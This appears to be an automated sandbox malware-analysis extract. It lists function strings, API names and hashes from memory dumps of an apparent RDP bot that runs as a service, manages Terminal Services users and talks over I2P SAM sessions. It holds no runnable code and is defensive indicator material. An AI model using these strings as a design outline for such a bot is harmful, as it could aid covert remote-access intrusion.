                    • String ID: (lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
                    • API String ID: 2747014929-3958755462
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                    • API String ID: 3154682637-708158336
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                    • String ID: (path != NULL)$5$H:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: OpenQueryValuefflushfwrite
                    • String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocCreateEnterLeaveProcessThread
                    • String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
                    • String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
                    • String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
                    • API String ID: 546114577-3142219161
                    • Opcode ID: 3cdc24c023b89066df0a726aa4c710322b7b89a6d544cc8f507da3a1f5a289d7
                    • Instruction ID: d1e2669f39e1dfac3790c993e58b57cdef4c05211904b549cc9ef3edb54e015d
                    • Opcode Fuzzy Hash: 3cdc24c023b89066df0a726aa4c710322b7b89a6d544cc8f507da3a1f5a289d7
                    • Instruction Fuzzy Hash: 1541EA10B0CAC3A2FB208F5CA8C03B812559F163D8F525032C75F6A2E2AE5DBD86B715
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
                    • String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
                    • API String ID: 610085118-1825955162
                    • Opcode ID: 976fff96366d5551afc8c362ad483118ae7add20c4f03ef8fba7955228ba521d
                    • Instruction ID: 212e0da161c33740eb9b41730af3f389f1c9c83ea08be17d0fe86562dda84c78
                    • Opcode Fuzzy Hash: 976fff96366d5551afc8c362ad483118ae7add20c4f03ef8fba7955228ba521d
                    • Instruction Fuzzy Hash: F2512C21E09E4686E7588B89E842279B7A4FF84FC9F186135DB4E037A5DF3DE4898300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: EnvironmentErrorExpandLastStringsfflushfwrite
                    • String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
                    • API String ID: 1721699506-2273971785
                    • Opcode ID: 50e05fe60871ecda0d75aea2f679edb60675657aefb85dd97d6e8b7658f1e7e4
                    • Instruction ID: 9f71ffc43107399a5d26866e7548455b8011f5851fb8a66cedc83221f109d2c8
                    • Opcode Fuzzy Hash: 50e05fe60871ecda0d75aea2f679edb60675657aefb85dd97d6e8b7658f1e7e4
                    • Instruction Fuzzy Hash: 3E617C26E2C54BC5FA20EB54EC40BB8E266AF41788FD40132D54D472E5DF3CE9A6832D
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: strlen$CompareFileTime
                    • String ID: %ProgramFiles%\RDP\$TermService$termsrv3$termsrv3$v32.ini$v32.ini
                    • API String ID: 342285119-844192579
                    • Opcode ID: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                    • Instruction ID: 5ec49a44ea275eaf98a0a2e00c77040399e4fb0a871c3d7812d6e86838ea2dd3
                    • Opcode Fuzzy Hash: 30368236fa65dfd26f33114051efb4c57a2f7cefb1022de13b1530c22006544d
                    • Instruction Fuzzy Hash: 8B519321B0C6C341FB219F2AA8D43BA5691AF857C4F464031EB9D4B7C7EE6DE905B740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$EnterFreeLeaveObjectProcessSingleWait
                    • String ID: [I] (%s) -> Client gone(client=0x%llx)$routine_gc
                    • API String ID: 4048354325-2700516951
                    • Opcode ID: ceed94a779caef79d74b583b335c059d09e5791cb031e572547082000981e090
                    • Instruction ID: 4a0349742de7a1b4417af5aa895bfc541aa65461b97198f31ea3d65abb330e86
                    • Opcode Fuzzy Hash: ceed94a779caef79d74b583b335c059d09e5791cb031e572547082000981e090
                    • Instruction Fuzzy Hash: 89410065A09E4685EB589FD9DC5227423A0BF44FEDF082635CF2D063E6DE3DE4988310
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strcpystrlen$strcmp
                    • String ID: DESTINATION$NAMING$NAMING LOOKUP NAME=ME$REPLY$RESULT$SESSION$SESSION CREATE STYLE=STREAM ID=%s DESTINATION=%s SIGNATURE_TYPE=%s %s %s$STATUS$TRANSIENT$VALUE
                    • API String ID: 245486318-5999096
                    • Opcode ID: eeba7b2acda8fb7677d32ffbf99bdfd9e78382d2291282e41cfa6244142f3c80
                    • Instruction ID: 51aa0585b63ad4a6c75e5a66557c7ea8c7fec59a2a4e2cd04572310cd8933f95
                    • Opcode Fuzzy Hash: eeba7b2acda8fb7677d32ffbf99bdfd9e78382d2291282e41cfa6244142f3c80
                    • Instruction Fuzzy Hash: AA713825E0DA4792EE249BADA9103B92390AF85BF4F684331DE6D577D6DF2CA901C340
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: CtrlErrorHandlerLastRegisterServicefflushfwrite
                    • String ID: $P$RDP-Controller$Service running$Service stopping$[E] (%s) -> RegisterServiceCtrlHandler failed(GetLastError=%lu)$[I] (%s) -> %s$svc_main$~
                    • API String ID: 3562457520-1478336053
                    • Opcode ID: 6c288d01f213306c2333a4f5c30fee87f9c9195217028b959cf3247afc90220d
                    • Instruction ID: defef908af9cc2e7a32fa124b1154e7bd3698e1519159341abada77ed5864f4b
                    • Opcode Fuzzy Hash: 6c288d01f213306c2333a4f5c30fee87f9c9195217028b959cf3247afc90220d
                    • Instruction Fuzzy Hash: 5051F350E2C60382FA60F7519D98BB8D2B09F54745FD04036CA0E562E2DF6DE8E6837E
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocFree$fflushfwritestrlen
                    • String ID: [D] (%s) -> %s$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$mem_realloc$sam3_send_req
                    • API String ID: 1135201459-1870638116
                    • Opcode ID: 227849ff22b57d487b6f2f8b521884c8c6484f6d2e9304749063794b68413051
                    • Instruction ID: bb23f7ffd16834d1c0bdfac5e91b45da8c9275663be49b7cdab2347660a30c74
                    • Opcode Fuzzy Hash: 227849ff22b57d487b6f2f8b521884c8c6484f6d2e9304749063794b68413051
                    • Instruction Fuzzy Hash: A7316661A0E64691FE50AFDDEC446F56390AF89FC4F988035EF4E46796EE2CEA04C740
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Heap$Process$AllocFreestrcpystrlen
                    • String ID: -LTCMAS-$-LTCSES-$XESS$[D] (%s) -> Logoff(name=%s,s_sid=%s,acct_expires=%x,ts_now=%llx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$on_tick_expiry
                    • API String ID: 925994320-1558387473
                    • Opcode ID: b18a5dea767c13263bad1b16b639a38f1e88cabe660c5e6b695c51396f16af22
                    • Instruction ID: e9d8b64337003f6161a576e53ae7d1ca0d2ee0460542316f32a0f7c578c08e4b
                    • Opcode Fuzzy Hash: b18a5dea767c13263bad1b16b639a38f1e88cabe660c5e6b695c51396f16af22
                    • Instruction Fuzzy Hash: E541ADA1A09BC686FA41AF1DD89037926A4BF84BC4F564034EF1E47396EE3CF841E310
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmp
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen
                    • String ID: ((*path_sz) > 0)$(path != NULL)$(path_sz != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,path_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,path_sz=%llu)$fs_path_temp
                    • API String ID: 39653677-3852240402
                    • Opcode ID: 7c2280b7281350a20a1e86a721c1de19fd939620f5cfef4fb2be988dbd6acc0c
                    • Instruction ID: 4120ca5c5f383254284aaedfed5cb5014123b9f20952ed870f4261d659df8f7d
                    • Opcode Fuzzy Hash: 7c2280b7281350a20a1e86a721c1de19fd939620f5cfef4fb2be988dbd6acc0c
                    • Instruction Fuzzy Hash: A041625196CA4791FA11FF14AC14BB8E261BF44748FD44131D65E072D6DF3CE9AA832C
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmp
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLast$accepthtonlhtonsioctlsocketselect
                    • String ID: [E] (%s) -> Failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,client=0x%llx,h=%08x,p=%u)$[W] (%s) -> select timedout(sock=0x%llx)$tcp_accept
                    • API String ID: 2278979430-4175654481
                    • Opcode ID: d839c0b84da7d548b6246506d3ca82f80e2902c7096f5b9e2af1ea17af3298de
                    • Instruction ID: ffddd4770663d87de11e6960a0244bb18847f7b4645361fc5d89ad3bba98ecce
